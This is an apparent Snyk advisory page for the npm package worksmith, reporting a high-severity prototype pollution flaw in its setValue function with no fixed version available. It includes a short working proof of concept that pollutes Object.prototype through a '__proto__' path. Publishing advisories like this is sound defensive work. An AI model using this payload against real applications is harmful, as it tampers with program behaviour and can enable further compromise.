worksmith@0.0.8

A purely functional workflow engine

  • latest version

    1.0.0

  • first published

    11 years ago

  • latest version published

    7 years ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the worksmith package. This does not include vulnerabilities belonging to this package’s dependencies.

    Fix vulnerabilities automatically

    Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

    Fix for free
    VulnerabilityVulnerable Version
    • H
    Prototype Pollution

    worksmith is an A purely functional workflow engine

    Affected versions of this package are vulnerable to Prototype Pollution via the setValue function.

    POC

    const worksmith = require('worksmith'); 
    worksmith.setValue({}, '__proto__.polluted', true); 
    console.log(polluted); // true
    

    How to fix Prototype Pollution?

    There is no fixed version for worksmith.

    *